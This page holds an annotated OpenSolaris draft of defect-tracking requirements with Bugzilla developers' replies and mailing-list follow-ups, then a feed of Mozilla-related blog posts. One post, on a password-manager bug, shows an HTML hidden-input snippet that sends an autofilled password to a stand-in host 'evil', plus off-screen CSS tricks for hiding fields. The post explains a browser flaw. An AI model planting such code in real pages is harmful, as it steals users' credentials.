    software, has been utilizing a historical DTS that has not been
    designed with an adaptable structure. The requirements are grouped
    into three sets of decreasing importance. It outlines a number of
    specific evaluations that will be used to determine whether there is
    an existing candidate DTS capable of meeting the requirements.

    2. Discussion

    2.1. Constraints

    As with most of the problems in transitioning from proprietary to
    open development, initial inspection might lead one to conclude that
    the defect tracking problem is overconstrained. In the course of
    reaching a coherent and ordered set of requirements for defect
    tracking, we explicitly identify some of the legacy constraints, and
    eliminate their influence on a potential solution.

    2.1.1. Anecdotal problems

    The present DTS solution at SMI, "Bugster", is the latest in a
    sequence of custom and semi-custom DTS installations. Ignoring the
    specifics of its technical implementation, Bugster presents three
    major problems for open development scenarios:

    * Per-account charge. The current licensing of the software
    requires that each active account requires a paid user license to
    an external software vendor. Given that we expect on the order of
    5000 active contributing developers the OpenSolaris and open JDK
    communities, an ongoing variable cost of this kind is problematic.

    * Performance and scalability. Similarly, the current system is
    implemented as an HA single clustered installation, capable of
    supporting 1200 concurrent active users.

    * Scrubbing and proprietary information boundaries. The information
    classification of the existing bug corpus is vague and
    inconsistent across the numerous development groups within SMI.
    Revisiting the current defects for possible publication is
    uneconomic, other than on an as-needed basis. The lack of a clear
    boundary has made some employees apprehensive about any defect
    publication.

    2.1.2. Integration aspects

    | * Upstream/downstream. The OpenSolaris program is an additional
    | step in a progression from an operating environment composed
    | entirely of components created and/or maintained by a single
    | organization to one constructed from a wide variety of components
    | originating from multiple organizations and individuals. Where
    | those components have defect state tracked in their own DTS, it
    | would be economically beneficial to have that state represented in
    | the community DTS used for the operating environment effort, both
    | to minimize duplicate efforts and to maintain accurate status on
    | the upstream component.

    * Other SMI systems. In contrast to the source code management
    replacement, the Bugster DTS provides data to other information
    | systems within Sun Microsystems. Although the burden of
    confidential data management rests with Sun (for that data it
    considers confidential), the DTS API must meet or exceed the
    current API provided by Bugster.

    2.2. Ideal outcome sequence

    Unfortunately, migrations from one DTS to another are expensive, at
    least in the experience of the Solaris/OpenSolaris bug corpus. A
    realistic idealized outcome would be three-phased, after the
    candidate DTS is selected and implemented:

    Phase 1. Two systems. Bugs could be filed in either system, and
    integrations could refer to bugs in either system. Duplicates
    would be encouraged to be closed in favour of the community DTS.
    Work on a toolset to minimize the cost of such closures and
    | migrations could begin. In principle, a Phase 1 deployment is
    | possible--for recording purposes--in one to three months after
    | selection. Some tools integration work is required to use the
    | selected candidate for commits and defect resolution.

    Phase 2. Deprecated second system. Integrations must refer only to
    bugs in the community DTS, but bugs could be filed in either system.
    New bug categories and classifications are created only in the
    community DTS. Client toolsets and distribution-specific systems
    [1] are expected to have adjusted to the community DTS capabilities.
    | After a successful exit from Phase 1, Phase 2 would run until the
    | legacy DTS is not deemed significant by the OpenSolaris Community.

    Phase 3. Single system. All relevant public defect data is present
    in the community DTS.


    Another option is to have the public bug system just be basically a beta until you know that all of your tools work with both systems, and then switch. This is a lot more convenient from the viewpoint of the new DTS, because it's a lot easier to import all the bugs from an old system all at once (as a single, consistent whole) than it is to add them into an already-existing database. -Mkanat 7/30/07 11:16 PM


    3. Requirements

    As with previous requirements documents [2], the requirements described
    below arise from a number of distinct classes: some are social, in
    that the requirement is believed necessary for successful use in the
    community; some are technical, in that the requirement is believed
    necessary to successfully produce software in a multi-project,
    multi-committer, multi-site development organization; and some are
    economic, in that the requirement is attempting to describe
    attributes that would limit the costs of the ongoing use of the
    tool.

    In an attempt to use neutral terms, we use the phrase "candidate
    DTS" to describe the DTS solution we are evaluating and "legacy DTS"
    to refer to the DTS solution in use (inside Sun, with partial
    visibility via bugs.opensolaris.org) at present.

    The requirements are ranked by necessity, using the terminology
    proposed in IEEE Std 830-1998 [3]. We incorporate many of the
    requirements from Wesolowski [4]. Many of the requirements are
    derived from the earlier evaluation of distributed source code
    management solutions [2].

    3.1. "Essential" requirements

    E0. Open source Bugzilla is licensed under MPL1.1 -Timeless 7/18/07 11:31 PM 


    To be considered for use by the OpenSolaris community, the
    candidate DTS is expected to be available in source form under
    an OSI-approved license. At this point in time, the community
    expects to be able to operate directly one or more distinct
    instances of the DTS.

    E1. Universal access Bugs in Bugzilla default to being public unless products are otherwise specially configured -Timeless 7/18/07 11:32 PM 


    With the exceptions identified below, all defect data pertaining
    to OpenSolaris's open components and imported open components
    must be available for search, view, and modify operations to
    participants. Data must become available to all users at the
    same time, unless restricted by an information management
    agreement (such as those used in industry collaborations around
    security vulnerabilities). Groups allow for restricting access for such collaboration -Timeless 7/18/07 11:32 PM 
    All Participants must be potentially
    eligible for any of the generally recognised defect workflow
    roles, such as responsible engineer (RE) and initial evaluator
    (IE), without reference to their affiliations outside the
    | Community. Anybody can hold any role in Bugzilla. -Mkanat 7/30/07 11:18 PM 


    |
    | Operations will use the Participant's OpenSolaris
    | credentials as a representation of the Participant's identity.
    | The candidate DTS should provide an API http://www.bugzilla.org/docs/tip/html/api/Bugzilla/Auth.html is the API for adding new authentication systems. -Mkanat 7/30/07 10:32 PM 
    that permits the addition of other identity representations, such as OpenID [5] https://bugzilla.mozilla.org/show_bug.cgi?id=300410 -Timeless 7/18/07 11:46 PM 
    .

    E2. Selective differentiated access Bugzilla's group system fully fulfills this requirement. -Mkanat 7/30/07 11:20 PM 


    A mechanism must exist to indicate that a defect is private to a
    set of Participants, and no part of it may be made accessible to
    Participants not in that set, even if the defect's subcategory
    would otherwise cause it to be accessible.

    This requirement is to allow for security coordination, and
    similar efforts. (Requests for differentiated access are
    expected to be managed by the Tools Group, the Board, or a
    designee. Distributions are expected to keep customer
    confidential data external to the Community DTS.)

    E3. Differentiated, configurable messaging

    All mail or other messages sent by the DTS to user-supplied
    addresses (such as but not limited to a defect's interest list or a
    subcategory's initial evaluator) containing defect data must enforce
    the confidentiality of defects described in E2. Messaging on
    defect transitions is expected to be configurable; one approach
    would be a message template system.
    Mail is sent according to group restrictions and user preferences, a user can ask to get mail but unless the groups allow for the mail, it won't be sent -Timeless 7/18/07 11:32 PM 

    Messaging and notification is expected to be delivered as
    | electronic mail. Support for additional protocols is, in
    | general, optional; support for some form of syndication is
    | desirable. Bug lists can be represented as RSS, which allows a sort of syndication. There are also IRC bots that can announce changes to bugs in IRC channels. Finally, you could also set up a mailing list that got emailed about certain changes on bugs, if you wanted. -Mkanat 7/30/07 10:33 PM 

    E4. Access control enforcement

    The DTS must enforce the access restrictions described in E2 and
    E3. It is not the intent of this specification to require any
    particular method of enforcement.

    E5. Interface stability and completeness


    The storage representation, command line interfaces, network
    protocols, and hooks interfaces should be documented and have
    some level of declared commitment.

    The XML-RPC interface is considered a stable interface. -Mkanat 7/30/07 11:23 PM

    There is documentation for the database schema here: http://www.ravenbrook.com/project/p4dti/tool/cgi/bugzilla-schema/  -- It also allows you to show the changes in the schema between any two versions of Bugzilla. -Mkanat 7/30/07 11:25 PM

    The state of the storage
    representation and the operations that modify it should be well
    defined, so that use with advanced file system capabilities can
    be assessed for hazards. (For example, consistent use with file
    system snapshot capabilities.)
    Storage is maintained in MySQL or PostgreSQL. Support for Oracle is likely to arrive soon https://bugzilla.mozilla.org/show_bug.cgi?id=189947

    Generally MySQL snapshotting is done via mysqlhotcopy or mysqldump. I know sun loves to emphasize ZFS and filesystem features and I'd love to see these work well,

    but I think they're slightly beyond my domain. -Timeless 7/18/07 11:57 PM 

    Use of the candidate DTS with advanced file system capabilities
    should be defined. (For example: Can ZFS clones be used to
    | back up the defect corpus? Can filesystem ACLs be used to control
    access to portions of the repository?)
    At the present time the only files that might be stored as distinct elements in the filesystem are overly large attachments.

    Otherwise the definition is "file system ACLs are not used",

    controls are provided by Groups which have basic inheritance and can restrict products or individual bugs.

    E6. Standard operations and transactions

    | The candidate DTS is expected to support a variety of standard
    | operations on defect reports. The following list of
    | transactions are to be assessed and documented by the evaluating
    | engineer:

    - create defect enter_bug.cgi -Timeless 7/19/07 12:04 AM 
    - modify defect content show_bug.cgi -Timeless 7/19/07 12:04 AM 
    - modify defect metadata show_bug.cgi -Timeless 7/19/07 12:04 AM 
    - place defect in resolved state (*) Resolve bug as ... -Timeless 7/19/07 12:04 AM 
    - restore defect from resolved to unresolved state (*) Reopen bug http://www.bugzilla.org/docs/3.0/html/lifecycle.html -Timeless 7/19/07 12:07 AM 
    - associate defect with external resource URL field, also you can create "attachments" that are URLs http://www.bugzilla.org/docs/3.0/html/attachments.html -Timeless 7/19/07 12:07 AM 
    - associate defect with another DTS-tracked defect Easy--Bugzilla supports the idea of bugs that depend on other bugs. -Mkanat 7/30/07 11:29 PM 

    | - associate defect with tag/text label keywords are dedicated labels, tags are available for private or shared use, and status whiteboard is freeform text -Timeless 7/19/07 12:13 AM 

    - change defect category Products/Components correspond to category/subcategory

    as they appear in bugs.opensolaris.org,

    a meta beyond Products called Classification also exists -Timeless 7/19/07 12:15 AM 

    Each of these transactions should correctly modify the defect
    state and send appropriate notifications.
    All direct changes to bugs are logged and mail is sent to elligible accounts configured to receive mail.

    Changes to resolutions of directly dependent bugs also trigger mail according to the same

    general rules. - Timeless 7/19/07 12:16 AM 

    Renaming a Product/Component does not generate mail,

    if this is considered a problem, it could easily be fixed -Timeless 7/19/07 12:16 AM 

    Equivalency (another operation or set of operations that might
    be used in place of an operation not specifically supported),
    | and the reasons for the omission of a transaction, are to be
    assessed and documented by the evaluating engineer.
    |
    | Additional operations supported by the candidate DTS on defect
    | reports should be documented by the evaluating engineer.
    Flags can be used to indicate additional state or nominations for states.

    Flags can be attached to bugs and attachments -Timeless 7/19/07 12:19 AM 

    E7. Scalability

    The candidate DTS must have one or more deployment
    methods that allow the DTS to carry large query loads. The
    latency between a defect report update and its accessibility to
    be queried must be documented for such scenarios.
    Shadow database used for queries http://www.bugzilla.org/docs/3.0/html/parameters.html#shadowdb -Timeless 7/19/07 12:20 AM 

    | E8. Interface extensibility

    Beyond the requirements of E3, an extensible interface, so that
    OpenSolaris-specific tools might be integrated with DTS
    operations is desired. Such an interface might be composed of a
    documented "hooks" interface, hooks http://www.bugzilla.org/docs/3.0/html/cust-hooks.html 

    are placed around most items and have a documented versioned interface -Timeless 7/19/07 12:25 AM

    Also see the list of current code hooks at http://www.bugzilla.org/docs/tip/html/api/Bugzilla/Hook.html- Mkanat 7/30/07 10:36 PM 
    a documented library interface, or
    some other modular approach. An extensive hooks interface, with
    hook evaluations able to terminate operations, is a strongly
    desired attribute in a candidate DTS; a candidate DTS with such
    an interface will be considered to meet fully this requirement.

    | Such interfaces are expected to allow the automation of specific
    | operations, such as the mass state updates performed by a
    | consolidation's C-Team.
    Confused. In bugzilla mass changes can be made by normal users using the UI.

    What is the purpose of this automation?

    Are you trying to supress bugmail or avoid using the standard user interface or improve speed? -Timeless 7/19/07 12:27 AM 
    |
    | It should be possible, via the interfaces or extension
    | facilities, to perform administrative operations on the DTS:
    | creation, modification, and closure of defect categories (or
    | other defect classifications);
    | creation, modification, and deletion of DTS user accounts (or
    | other user or group relationships); and similar operations.
    |Deleting anything is not recommended (this is a personal view).

    Bugzilla can delete things. However, generally in an open system,

    you should never delete anything. -Timeless 7/19/07 12:30 AM 

    | E9. Stable defect representation
    |
    | Specifically extending E3 and E8, the candidate DTS will have a
    | stable, formatted representation of a defect report. A
    | candidate DTS that emitted defect reports in a documented plain
    | text or XML format would satisfy this requirement.
    |a dtd https://bugzilla.mozilla.org/bugzilla.dtd is included with bugzilla.

    Any accessible bug can be retrieved as an xml file in that format. -Timeless 7/19/07 12:33 AM 

    | E10. Hierarchical defect classification
    |
    | It appears that a candidate DTS, to represent the current defect
    | corpus, must provide some means of classification that can
    | represent at least a product-category-subcategory hierarchy.

    Classification http://www.bugzilla.org/docs/3.0/html/classifications.html /

    Product http://www.bugzilla.org/docs/3.0/html/products.html /

    Component http://www.bugzilla.org/docs/3.0/html/components.html -Timeless 7/19/07 12:46 AM 

    | (Although a candidate DTS could meet this requirement with only
    | generic defect metadata ("tagging"), it is expected that queries
    | will regularly use the defect classifications to narrow the
    | query results, leading to an effective performance criterion.)
    |
    | 2.2. "Conditional" requirements
    |
    | C11. Ease of use
    |
    | The candidate DTS should be easy to install in a reasonably
    | self-contained fashion. In principle, shipment in an
    | OpenSolaris consolidation should be possible with a finite
    | investment of resources, meaning that the candidate DTS does
    | not have a complicated makefile system, has dependencies that
    | can be easily managed, etc.

    The majority of installation is done by a single script, which also prints out all the dependencies (which are mostly just Perl modules) -Mkanat 7/30/07 10:39 PM 
    |
    | The primary interfaces should be understandable based on the
    | interfaces and documentation to a user familiar with
    | DTS concepts.
    |Bugzilla is the de-facto standard OSS bug-tracker, so most people are familiar with it, particularly in the Open Source world. -Mkanat 7/30/07 10:39 PM 

    | C12. Stable per-defect URIs
    |
    | The candidate DTS should provide a unique URI for each defect
    | represented in the system, or at very minimum, a unique ID that
    | can be used as the basis for such a URI. The unique component
    | is expected to have some association with the product or
    | products tracked by the candidate DTS.
    |urlbase/show_bug.cgi?id=ID. bugs.opensolaris.org doesn't do more.

    If a bug changes product and you encode the product as part of the

    unique ID, then you have problems. I don't understand why this


    is listed as a requirement. -Timeless 7/19/07 12:48 AM 

    | A candidate DTS that provides a monotonically increasing URI
    | component, such as a "counter", would satisify this requirement.
    urlbase/show_bug.cgi?id=ID -Timeless 7/19/07 12:51 AM 

    |
    | C13. Tool community health
    |
    | The community or author of the candidate DTS needs to be active
    | and engaged with their user population. The ability of the
    | candidate DTS's community to absorb, directly or through a
    | liaison, the defects and feature requests of the OpenSolaris
    | community should be estimated, preferably by a direct inquiry to
    | the candidate DTS community

    Bugzilla is generally very active and able to absorb defects and feature requests, particularly if Sun is interested in contributing code. -Mkanat 7/30/07 10:40 PM 

    | C14. OpenSolaris community implementation expertise
    |
    | One or more contributors within the OpenSolaris community need
    | to be able to assess potential defects in the implementation of
    | the candidate DTS and potentially participate in the development
    | of new features or supporting tools for the candidate DTS.
    |This is left as an exercise for someone else. It seems that a number

    of people in the OpenSolaris community have some familiarity with Bugzilla. -Timeless 7/19/07 12:53 AM 

    | C15. Transactional operations and corruption recovery

    The operations on the candidate's defect datastore should have
    defined semantics, in particular identifying non-atomic
    transactions and mechanisms for recovery from a corrupted
    datastore. This requirement may be met by the underlying
    datastore technology.

    This is mostly met by MySQL. Thanks to table locking, there should be no non-atomic operations, and table corruption can be repaired with standard MySQL tools.-Mkanat 7/30/07 10:42 PM

    There's also sanitycheck.cgi, which checks the database for consistency from the viewpoint of Bugzilla and offers automatic repairs. -Mkanat 7/30/07 10:43 PM 


    | C16. Search capability
    |
    | An integrated search capability of the text representation of
    | the defect corpus is a desired feature in the candidate DTS. It
    | is possible to construct a search capability, given E3 and E9,
    | but an facility integrated with the various client components is
    | preferred.
     http://www.bugzilla.org/docs/3.0/html/query.html -Timeless 7/19/07 5:10 AM 
    |
    2.3 "Optional" requirements

    | O17. Attachment handling

    The legacy DTS manages large attachments as an integrated
    feature, to manage system crash dumps, process corefiles,
    application output, etc. related to the failures captured by a
    defect report. Since a simple file archival service can meet
    these requirements--once restricted access due to
    confidentiality is removed--the candidate DTS need not provide
    its own attachment handling feature.

    Bugzilla does, however, have excellent attachment features. It capable of storing attachements either in the DB, on the filesystem, or both. -Mkanat 7/30/07 10:44 PM 


    3. Evaluations

    We anticipate a number of qualitative and quantitative tests to
    evaluate the satisfaction of the various requirements, where a
    "meets" or "does not meet" result is not applicable.

    3.1. Representational and performance criteria

    These criteria focus on the ability of the candidate DTS to
    represent a large set of distinct, interrelated defects. The
    | current Sun Microsystems defect corpus contains in the vicinity of
    three million defect reports. Evaluations will be performed on a
    | defect corpus derived from that published on bugs.opensolaris.org; this
    corpus will have at least 100 000 defect reports.
    Bugzilla can easily manage 400 000 reports,

    https://bugzilla.mozilla.org/report.cgi?x_axis_field=resolution&y_axis_field=product&z_axis_field=&query_format=report-table&format=table&action=wrap  -Timeless 7/19/07 5:26 AM 
    Bugzilla should easily be able to handle a virtually infinite number of bug reports. Performance, in almost every area, is not at all dependent upon the number of bug reports in the DB.  It is already designed with scalability in mind. We're also very willing to work with any user in improving any significant performance issues discovered. -Mkanat 7/30/07 10:45 PM 

    The expected set of meaningful operations for performance evaluation
    are:

    - unresolved defects query against a product or category,

    Open bugs in the Bugzilla product (3000 bugs out of 400,000): https://bugzilla.mozilla.org/buglist.cgi?query_format=advanced&order=relevance+desc&bug_status=__open__&product=Bugzilla    -Mkanat 7/30/07 10:50 PM

    - defect query by keyword or other text label,

    All bugs with the word "bug" in the title (out of 400,000): http://tinyurl.com/34hva5 -Mkanat 7/30/07 10:55 PM

    - defects resolved by a single responsible engineer,
    All bugs in the Bugzilla product resolved by me: http://tinyurl.com/3agto -Mkanat 7/30/07 10:56 PM 

    | Various candidate DTSs may provide notions of defect classification,
    | state, importance, or other attributes. Queries against these
    | attributes should be evaluated, equivalent to
    |
    | - defects in either a resolved or an unresolved state, for a given
    | classification,

    All open bugs in the Testopia product: http://tinyurl.com/2r8ore -Mkanat 7/30/07 11:00 PM

    | - defects addressed in a given build/release

    All bugs addressed in Bugzilla 3.0: http://tinyurl.com/3e58kk -Mkanat 7/30/07 11:00 PM

    | - unresolved defects, ordered by importance

    Unresolved bugs targeted to the Bugzilla 3.0 branch, ordered by importance: http://tinyurl.com/2pafg2  (note that many of those bugs have not yet been assigned a priority, and so show up at the top of the list) -Mkanat 7/30/07 11:05 PM 
    |
    The candidate DTS will be evaluated for data integrity by
    interruption of the set of operations by signal and by machine
    failure.

    The safety of the candidate DTS with respect to file system
    capabilities will be evaluated using ZFS snapshot/clone technology
    for safe repository copies.

    3.2. Implementation criteria

    The candidate DTS implementation will be assessed by a design and
    code review by an OpenSolaris contributor with expertise in the
    implementation language of the candidate DTS.

    4. References

    [1] S. Hahn, "OpenSolaris: Defect tracking relationships", 2007.
    http://blogs.sun.com/sch/entry/opensolaris_defect_tracking_relationships

    [2] OpenSolaris Distributed Source Code Management Requirements, 2005.

    [3] IEEE Std 830-1998, "IEEE Recommended Practice for Software
    Requirements Specifications", 1998.

    [4] K. Wesolowski, "Defect Management Requirements in an Open
    Development Paradigm", 2006.
    |
    | [5] OpenID, http://openid.net

    --
    sch at sun dot com http://blogs.sun.com/sch/
    _______________________________________________
    tools-discuss mailing list
    tools-discuss at opensolaris dot org
    sommerfe

    Posts: 535
    From: Burlington, MA
    Registered: 3/21/05

    		Re: Draft DTS requirements, 2
    Posted: Jun 19, 2007 3:23 PM   in response to: Stephen Hahn in response to: Stephen Hahn

      Click to reply to this thread Reply

    On Tue, 2007-06-19 at 13:53 -0700, Stephen Hahn wrote:
    > 2. The relationship between the development branch and the
    > maintenance branches of any particular consolidation does not seem
    > well understood. It seems premature to conclude that a multiple
    > release relationship belongs in the community DTS, versus a
    > distribution's annotations. We can come back to this, perhaps as
    > some of the candidate evaluations proceed.

    it also seems premature to conclude that there will only ever be one
    community-controlled line of development for a codebase and that as a
    result distributions would be the only consumers of this feature.

    - Bill


    _______________________________________________
    tools-discus s mailing list
    tools-discuss at opensolaris dot org
    Stephen Hahn
    sch at sun dot ...

    		Re: Draft DTS requirements, 2
    Posted: Jun 19, 2007 4:49 PM   in response to: sommerfe in response to: sommerfe

      Click to reply to this thread Reply

    * Bill Sommerfeld [2007-06-19 15:23]:
    > On Tue, 2007-06-19 at 13:53 -0700, Stephen Hahn wrote:
    > > 2. The relationship between the development branch and the
    > > maintenance branches of any particular consolidation does not seem
    > > well understood. It seems premature to conclude that a multiple
    > > release relationship belongs in the community DTS, versus a
    > > distribution's annotations. We can come back to this, perhaps as
    > > some of the candidate evaluations proceed.
    >
    > it also seems premature to conclude that there will only ever be one
    > community-controlled line of development for a codebase and that as a
    > result distributions would be the only consumers of this feature.

    Sure, that's fair. I guess my point is really that there seem to me
    to be a couple of ways to achieve multi-release history for a defect,
    and I don't want to restrict it to the way Bugster does it, at least
    until we've looked at one or two alternative approaches.

    - Stephen

    --
    sch at sun dot com http://blogs.sun.com/sch/
    _______________________________________________
    tools-discuss mailing list
    tools-discuss at opensolaris dot org

    Go Back Back to Thread List





    Terms of Use | Privacy | Trademarks | Copyright Policy | Site Guidelines
    Your use of this web site or any of its content or software indicates your agreement to be bound by these Terms of Use.
    Copyright © 1995-2005 Sun Microsystems, Inc.
    Our lawyer is making us say that OpenSolaris is a trademark of Sun Microsystems, Inc.



    0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Tue, 31 Jul 2007 06:55:00 +0000 http://maemo.org/midcom-permalink-3be3e2ca393411ddb2e991091f51a00aa00a     But I don't like it when people steal my password! http://viper.haque.net/~timeless/blog/132/ But I don't like it when people steal my password!

    But I don't like it when people steal my password!

    What should you do if you can't trust your web sites?

    You have bigger problems, Hold them accountable.

    Aren't you using a password manager?

    It seems you are...

    Why would you choose to use the same password on multiple servers?

    :) I'm a proponent of using randomly generated per account passwords 0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Wed, 22 Nov 2006 06:28:00 +0000 http://maemo.org/midcom-permalink-3b3c10ae393411ddb2e991091f51a00aa00a     Firefox bug #360493: NEW: Cross-Site Forms + Password Manager = Security Failure ... http://viper.haque.net/~timeless/blog/131/ Is that the bug from slashdot?

    Yes, yes, the /. bug

    It's a site bug. Why people complain about web browsers is beyond me.

    Can you elaborate?

    If the web site can give you a login form that looks correct. Who cares if your web browser might give it the password.

    Epiphany from FC6 is vulnerable, rcsr1

    You might give the password to the site anyway.

    Am I arguing that auto fill in of passwords for pages on the wrong domains is NOT a bug?

    Indeed, I'm arguing that it is not the core bug.

    Fundamentally, I don't care if my browser happens to do it. If the web server lets me be tricked, it's not the browser's fault; It's the web-master's fault. Further, if no web sites you trust are messed up, then the fact that the web browser has this behavior is not a problem.

    Is mozilla entering saved passwords on pages not originating on the server you saved it for?

    No, it doesn't do that. The issue is that the passwords are restored based on the url for the page. Not based on some random destination to which the page might choose to send the password.

    Why isn't the form target url considered?

    It's utterly pointless; and it'll break Gmail, Passport, and most single sign on systems. Imagine I have: 

    <form><input id="password" type="hidden" onchange="form.action='http://evil/sendit';form.submit()">
    There's no action associated w/ the form when it is filled. This isn't actually that uncommon....

    So basically mozilla is auto-entering passwords for form fields, regardless from the url it's being sent to?

    Right, it can't know where it's going, that's decided much later and is subject to change randomly. Oh and btw, the web page could encode the password into an image url and just ask for that url instead, there is no real requirement that it submit a real form.

    If the page you go to isn't trustworthy, then your problem is that the page isn't trustworthy. It really is that simple.

    Is a workaround is not to fill in passwords in invisible form entries?

    No

    Solving the "is this hidden" question is hard: 

     <input style="left:-100px; top:-100px">
 <input style="z-order:-1">
    Oh, it might be as well a visible element with position:absolute left: -1000px; top: -1000px;?

    Good, you're getting the idea, the point is that the web sites you visit must be trustworthy. And if they aren't, you need to scream loudly at them, or take your business elsewhere.

    So the "bug" is mostly a website problem, but helped by a "browser feature"?

    Right.

    0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Wed, 22 Nov 2006 06:15:00 +0000 http://maemo.org/midcom-permalink-39fa7244393411ddb2e991091f51a00aa00a     The worst scourge http://viper.haque.net/~timeless/blog/129/ The worst scourge

    The worst scourge

    What's the problem?

    the basic problem is that we have "hackers" who are scanning bonsai logs for references to security bugs. when they find them, they read the diffs and try to find something that was fixed to be not exploitable. if they find such a thing, they then try to write an exploit. and then they unleash it on whatever portion of the world doesn't yet have the fix. the way they find a bug that's "interesting" is that bugzilla explicitly tells them it's interesting.

    Isn't this a common problem with open-source software that exposes SCM to the world?

    yep

    What could we do?

    solution 1 is to have shadow bugs

    How is Bugzilla telling them it's interesting if you have security bugs marked specifically as such and only allow security-based team members view security issues?

    bugzilla says "you can't see this bug". that instantly tells them it's interesting

    How would we do this?

    solution step a is to create a shadow bug which has a vague problem statement, a patch, reviews, and a commit record pointing to it.

    How would a shadow bug prevent it if it's created automatically?

    it isn't created automatically, it's created by hand.

    now, the problem is then, people will eventually recognize the form and authors to look for for shadow bugs.

    well, the best proposal i have for dealing w/ that is called hiding hay in a haystack. basically i've filed the most bugs by far in bugzilla. and i file lots of bugs often, and my bugs are often uselessly vague, quickly patched, reviewed w/o comment, and resolved.

    What does that make me?

    That makes me the perfect haystack. but, not everyone can file bugs as timeless. because, well, i'm me.

    What could we do?

    we could either let people actually file bugs as me, or make me file security shadows . but, that gets a bit messy. I'm actually ok with everyone filing or using me to file such bugs, so let's temporarily assume this problem is solved such that people don't try to stalk my bugs.

    What will hackers do instead?

    They'll try to recognize which specific set of people fix security bugs or review them.

    How can we deal with this?

    well, if the shadows and all other bugs don't tell you names.

    just "experienced developer filed bug", and "second experienced developer posted patch", and "third experienced developer reviewed patch", etc. then maybe there's no trace that people can follow.

    Wouldn't that be more likely to cause confusion among non-security members that don't have malicious intent?

    one problem set at a time. in short, the goal is that some long time into the future the security bugs would be declassified and they'd then establish a reference to the shadow bugs. the problem with doing this is that people will learn whatever patterns we leave. The goal of the following proposal is to make it such that there isn't much in the way for them to see without first paying so much to us as contributors that their involvement should preclude them from attacking us.

    level stepping the playing field 0 Add to favourites0 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Wed, 11 Oct 2006 03:12:00 +0000 http://maemo.org/midcom-permalink-397a03ac393411ddb2e991091f51a00aa00a Of Mice, Men, Gods, Mortals, and classes in between http://viper.haque.net/~timeless/blog/130/ I know bugzilla.gnome.org uses points... currently when I visit BGO, it shows me a real name and a point category.

    I'm unfortunately in a position where I want to only show real names to people if:

    1. The person being shown specifically blesses the person/person's group
    2. The person observing and the person being observed are relatively "close" as measured by point categories
    If neither apply then instead of seeing real names, you'd see point-category-person-A with the letters (A, B, ...) being given out sequentially to accounts involved in the bug. Letters would only be uniquely assigned to accounts for individual bugs.

    OK, point categories...

    • probably assigned as ranges say 1..5, 6..10, 11..15, 16..20, ...
    • possibly re-centered based on the observer.
    The goal is to obfuscate who is doing what without actually hurting a user's ability to interact with people. The problem is basically that we have some people who are known for making changes from which other people can financially benefit.

    <marnanel> gosh, how exciting. covert subterfuge and stuff.

    Imagine you were able to watch people entering and leaving: 

    E Capitol St NE & 1st St NE, Washington, DC 20001

    And from there you could figure out what is happening inside, without looking, and then you could do something which would earn you money/fame/fortune - unfortunately, harming the world in the process.

    <marnanel> this is bugzilla.fbi.gov or something? :)

    The hypothesis is that you wouldn't be able to do this if you couldn't see the faces of the people. The problem is that if you can't see any of the faces at all, then you don't know who is at least somewhat important. It's OK to recognize the difference between a clerk and a cleaner and an elected rep. I need to give a parallel to my problem w/o explicitly writing it.

    I think the parallel works reasonably well.

    2 Add to favourites1 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Wed, 11 Oct 2006 02:43:00 +0000 http://maemo.org/midcom-permalink-39babb04393411ddb2e991091f51a00aa00a     Extension Manager http://viper.haque.net/~timeless/blog/127/ Extension Manager

    Extension Manager

    I'm sure that the Addons Manager is better. But sometimes I'm an end user. Extension Manager from Firefox 1.5 with my extensions

    Take a look at this picture and study it for a bit. Pretend you're an end user an answer these questions:

    What ordering scheme is it using for this list?

    I have no idea.

    If you don't like this question, let me try again. Pretend you're an end user and you're looking for an extension and you know its name.

    How would you find the XHML Mobile Profile extension in this list?

    Because of the fact that I can't figure out the ordering scheme, it looks like I'm going to have to read all of them.

    How would you find all extensions relating to CSS?

    Hrm, looks like you're going to have to read each of:

    1. The name
    2. The contract (for all you know it's css@vendor and the name and description don't have css).
    3. The description
    4. The ICON!
    For a moment, pretend you're blind (if this isn't politically correct, contact me with alternate wording).

    Is it at all possible for you to find all the CSS related extensions?

    I believe the answer is no. :(, I'm sorry.

    Are you sure you don't have to read the version field too?

    Nope, I'm not at all sure given that there seems to be quite a lot of diversity among the version fields.

    Are any of these extensions in unusual states?

    As it happens, two of them are, but I'm not sure anyone could easily figure it out. I'll ask some people and see.

    Why is the window so wide?

    I'm glad you asked. If I didn't make it wider, you couldn't see all the text for one of those rows.

    Whose fault is that?

    Well, you could claim that the author wrote a bad description. But people prefer to complain about firefox not behaving well when outragious things happen.

    What version am I runnning?

    You mean you can't tell?

    I guess you can't, heh. This is Firefox 1.5.0.5 Official. I'd make a picture but the last time i tried to do that, the results weren't particularly stunning.

    What does the extension manager normally look like?

    Fairly normal window size of Extension Manager 0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Tue, 01 Aug 2006 10:36:00 +0000 http://maemo.org/midcom-permalink-392fb388393411ddb2e991091f51a00aa00a     Proposal for a Community Relations Manager http://viper.haque.net/~timeless/blog/126/ Proposal for a Community Relations Manager

    Proposal for a Community Relations Manager

    My suggestion is very simple. Hire a Community Relations Manager (basically to fill the role that Asa had when he first started working for mozilla.org). The main requirements are good communication skills and good interpersonal relations.

    Each of the individual items listed below is optional, even just one person working on a single point a couple of hours a month would be a big win. There are two areas of focus (so this job shouldn't be boring):

    One area is old bugs in all components, they need triaging (pick any component or any product). One restriction is that the number of bugmails that should be generated per component per week should be limited. i.e. Avoid the approach of flooding developers with tens of thousands of emails. Limits should be somewhere around 5-10 bugs per component per day, possibly capped to 25 per component per week. The goal here is to help developers by cleaning up their components but without causing them to lose lots of time figuring out what just happened and whether they need to read hundreds of bugs start to finish to second guess the changes that were just made. Things that can be done:

    1. Resolve old bugs as duplicates.
    2. Find dependencies.
    3. Test a bug and determine that it can be resolved worksforme.
    4. Find bugs that have patches but no requests (this unfortunately goes with the next task).
    5. Try to reduce bugs to simpler testcases.
    6. If a comment in a bug asked someone for information and there's no response, try to contact that person and get the information that was requested.
    7. If a bug seems fixed, and there are already too many requests and such above, use bonsai+old builds to track down the bug that fixed it.
    The second area is shepherding patches through the review process. There are a number of pieces.
